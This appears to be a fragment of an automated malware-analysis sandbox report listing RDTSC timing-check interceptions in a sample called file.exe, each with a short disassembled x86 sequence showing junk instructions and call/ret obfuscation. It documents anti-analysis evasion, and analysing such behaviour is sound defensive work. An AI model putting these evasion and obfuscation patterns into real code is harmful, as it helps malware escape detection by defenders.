                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BAA532 second address: BAA5BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a movzx ebx, bx 0x0000000d jno 00007FB9B100571Eh 0x00000013 push dword ptr fs:[00000000h] 0x0000001a mov ebx, 3F0F7672h 0x0000001f mov dword ptr fs:[00000000h], esp 0x00000026 push 00000000h 0x00000028 push ebx 0x00000029 call 00007FB9B1005718h 0x0000002e pop ebx 0x0000002f mov dword ptr [esp+04h], ebx 0x00000033 add dword ptr [esp+04h], 00000016h 0x0000003b inc ebx 0x0000003c push ebx 0x0000003d ret 0x0000003e pop ebx 0x0000003f ret 0x00000040 mov bx, dx 0x00000043 mov eax, dword ptr [ebp+122D0E3Dh] 0x00000049 cld 0x0000004a push FFFFFFFFh 0x0000004c push 00000000h 0x0000004e push eax 0x0000004f call 00007FB9B1005718h 0x00000054 pop eax 0x00000055 mov dword ptr [esp+04h], eax 0x00000059 add dword ptr [esp+04h], 0000001Bh 0x00000061 inc eax 0x00000062 push eax 0x00000063 ret 0x00000064 pop eax 0x00000065 ret 0x00000066 mov dword ptr [ebp+122D2910h], edx 0x0000006c push eax 0x0000006d pushad 0x0000006e push eax 0x0000006f push edx 0x00000070 jng 00007FB9B1005716h 0x00000076 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BAA5BD second address: BAA5C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BAE0F5 second address: BAE11D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9B1005729h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jng 00007FB9B1005716h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BAE11D second address: BAE127 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FB9B11D9846h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BAF0AB second address: BAF12C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007FB9B1005718h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 0000001Dh 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 jmp 00007FB9B100571Ah 0x00000029 push 00000000h 0x0000002b mov ebx, edi 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push eax 0x00000032 call 00007FB9B1005718h 0x00000037 pop eax 0x00000038 mov dword ptr [esp+04h], eax 0x0000003c add dword ptr [esp+04h], 00000018h 0x00000044 inc eax 0x00000045 push eax 0x00000046 ret 0x00000047 pop eax 0x00000048 ret 0x00000049 sub dword ptr [ebp+12445732h], edi 0x0000004f xchg eax, esi 0x00000050 jmp 00007FB9B1005724h 0x00000055 push eax 0x00000056 push eax 0x00000057 push edx 0x00000058 push edx 0x00000059 push edx 0x0000005a pop edx 0x0000005b pop edx 0x0000005c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BAF337 second address: BAF33B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BAF33B second address: BAF345 instructions: 0x00000000 rdtsc 0x00000002 js 00007FB9B1005716h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BB23ED second address: BB23F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BB2A14 second address: BB2A19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BB2ACE second address: BB2AD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BB2CFF second address: BB2D1E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9B1005723h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d push esi 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BBDDEC second address: BBDDF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BBDDF0 second address: BBDE13 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9B1005725h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jo 00007FB9B1005718h 0x00000011 push esi 0x00000012 pop esi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BBDF72 second address: BBDF76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BBDF76 second address: BBDF7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BBDF7A second address: BBDFA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB9B11D9850h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FB9B11D9856h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BBDFA9 second address: BBDFAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BC541B second address: BC5464 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9B11D9859h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FB9B11D984Bh 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 jnp 00007FB9B11D9850h 0x00000019 jmp 00007FB9B11D984Ah 0x0000001e mov eax, dword ptr [eax] 0x00000020 push eax 0x00000021 push edx 0x00000022 jne 00007FB9B11D9848h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BC9822 second address: BC982D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BC982D second address: BC9831 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BC9831 second address: BC9842 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FB9B1005716h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BC9842 second address: BC9848 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BC9848 second address: BC9871 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FB9B1005716h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FB9B1005720h 0x00000014 jmp 00007FB9B100571Ah 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BC99BE second address: BC99C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BC99C4 second address: BC99DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 pushad 0x00000007 jmp 00007FB9B1005720h 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BC99DE second address: BC99E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BC99E4 second address: BC99F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BC99F0 second address: BC99F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BC9B7C second address: BC9B81 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BC9B81 second address: BC9B87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BC9B87 second address: BC9B8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BC9B8D second address: BC9B93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BC9E5B second address: BC9E5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BC9E5F second address: BC9E63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BC9E63 second address: BC9E76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push esi 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push edx 0x0000000d pop edx 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BC9E76 second address: BC9E92 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9B11D984Ch 0x00000007 jns 00007FB9B11D9846h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BCA2E1 second address: BCA2E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BCA2E7 second address: BCA2ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BCA2ED second address: BCA306 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FB9B1005722h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BCEAF8 second address: BCEB2C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FB9B11D9857h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnc 00007FB9B11D9855h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BCEB2C second address: BCEB34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BCEB34 second address: BCEB48 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FB9B11D9846h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jo 00007FB9B11D9846h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BCEB48 second address: BCEB4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BCEB4C second address: BCEB50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BCDA82 second address: BCDA8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FB9B1005716h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B9E3F1 second address: B9E3F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B9E3F6 second address: B7D9C8 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FB9B100571Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push edi 0x00000010 call 00007FB9B1005718h 0x00000015 pop edi 0x00000016 mov dword ptr [esp+04h], edi 0x0000001a add dword ptr [esp+04h], 00000017h 0x00000022 inc edi 0x00000023 push edi 0x00000024 ret 0x00000025 pop edi 0x00000026 ret 0x00000027 mov edx, 3F1E55FFh 0x0000002c call dword ptr [ebp+122D346Eh] 0x00000032 jmp 00007FB9B100571Ch 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B9EAD6 second address: B9EB0A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007FB9B11D984Eh 0x0000000e popad 0x0000000f popad 0x00000010 xor dword ptr [esp], 7EB20AD3h 0x00000017 mov dword ptr [ebp+122D3669h], edx 0x0000001d push 7F57566Bh 0x00000022 jnp 00007FB9B11D984Eh 0x00000028 push ebx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B9EC58 second address: B9EC5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B9ED0C second address: B9ED12 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B9ED12 second address: B9ED72 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 ja 00007FB9B1005716h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e jc 00007FB9B1005718h 0x00000014 pushad 0x00000015 popad 0x00000016 pop eax 0x00000017 mov eax, dword ptr [esp+04h] 0x0000001b jmp 00007FB9B1005722h 0x00000020 mov eax, dword ptr [eax] 0x00000022 je 00007FB9B100572Eh 0x00000028 mov dword ptr [esp+04h], eax 0x0000002c pushad 0x0000002d pushad 0x0000002e pushad 0x0000002f popad 0x00000030 pushad 0x00000031 popad 0x00000032 popad 0x00000033 push eax 0x00000034 push edx 0x00000035 jbe 00007FB9B1005716h 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B9ED72 second address: B9ED76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B9EFAF second address: B9EFB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B9EFB3 second address: B9EFB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B9EFB7 second address: B9EFC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B9F332 second address: B9F336 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B9F336 second address: B9F3B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebp 0x0000000d call 00007FB9B1005718h 0x00000012 pop ebp 0x00000013 mov dword ptr [esp+04h], ebp 0x00000017 add dword ptr [esp+04h], 0000001Ch 0x0000001f inc ebp 0x00000020 push ebp 0x00000021 ret 0x00000022 pop ebp 0x00000023 ret 0x00000024 mov edi, 0D76E2C3h 0x00000029 push 0000001Eh 0x0000002b push 00000000h 0x0000002d push eax 0x0000002e call 00007FB9B1005718h 0x00000033 pop eax 0x00000034 mov dword ptr [esp+04h], eax 0x00000038 add dword ptr [esp+04h], 0000001Ah 0x00000040 inc eax 0x00000041 push eax 0x00000042 ret 0x00000043 pop eax 0x00000044 ret 0x00000045 mov ecx, dword ptr [ebp+122D38F1h] 0x0000004b mov dword ptr [ebp+122D2C59h], esi 0x00000051 push eax 0x00000052 push eax 0x00000053 push edx 0x00000054 jmp 00007FB9B1005724h 0x00000059 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B9F6A1 second address: B9F6A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B9F7CE second address: B9F7DE instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FB9B1005716h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B9F7DE second address: B9F7E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B9F7E2 second address: B9F7E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B9F7E6 second address: B9F856 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 nop 0x00000008 xor edi, dword ptr [ebp+122D3905h] 0x0000000e lea eax, dword ptr [ebp+12480111h] 0x00000014 push 00000000h 0x00000016 push edi 0x00000017 call 00007FB9B11D9848h 0x0000001c pop edi 0x0000001d mov dword ptr [esp+04h], edi 0x00000021 add dword ptr [esp+04h], 0000001Bh 0x00000029 inc edi 0x0000002a push edi 0x0000002b ret 0x0000002c pop edi 0x0000002d ret 0x0000002e mov cx, 9FE8h 0x00000032 mov edi, dword ptr [ebp+122D2915h] 0x00000038 movsx edi, cx 0x0000003b nop 0x0000003c pushad 0x0000003d push eax 0x0000003e push ebx 0x0000003f pop ebx 0x00000040 pop eax 0x00000041 jng 00007FB9B11D9854h 0x00000047 jmp 00007FB9B11D984Eh 0x0000004c popad 0x0000004d push eax 0x0000004e pushad 0x0000004f push eax 0x00000050 push edx 0x00000051 jmp 00007FB9B11D984Dh 0x00000056 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B9F856 second address: B9F860 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B9F860 second address: B7E4FB instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FB9B11D9846h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007FB9B11D9848h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 00000014h 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 mov dl, ADh 0x00000028 call dword ptr [ebp+122D2D6Ah] 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007FB9B11D984Dh 0x00000035 jmp 00007FB9B11D9859h 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BCDD85 second address: BCDD94 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BCDD94 second address: BCDDA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jnp 00007FB9B11D9846h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BCDDA3 second address: BCDDA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BCE2D9 second address: BCE2DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BCE703 second address: BCE70E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jp 00007FB9B1005716h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BD1956 second address: BD195E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BD195E second address: BD1969 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FB9B1005716h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BD82AF second address: BD82B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BD82B5 second address: BD82B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BD82B9 second address: BD82C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BD82C7 second address: BD82CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BD6F82 second address: BD6FA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB9B11D9854h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pushad 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BD6FA0 second address: BD6FBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jl 00007FB9B1005716h 0x0000000c jmp 00007FB9B1005721h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BD6FBF second address: BD6FC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BD712F second address: BD7138 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BD76D9 second address: BD76DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BD76DF second address: BD76E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BD76E3 second address: BD7718 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9B11D984Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FB9B11D984Ah 0x00000010 jmp 00007FB9B11D9857h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BD7718 second address: BD771C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BD6C20 second address: BD6C56 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9B11D9858h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FB9B11D9856h 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BD6C56 second address: BD6C5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
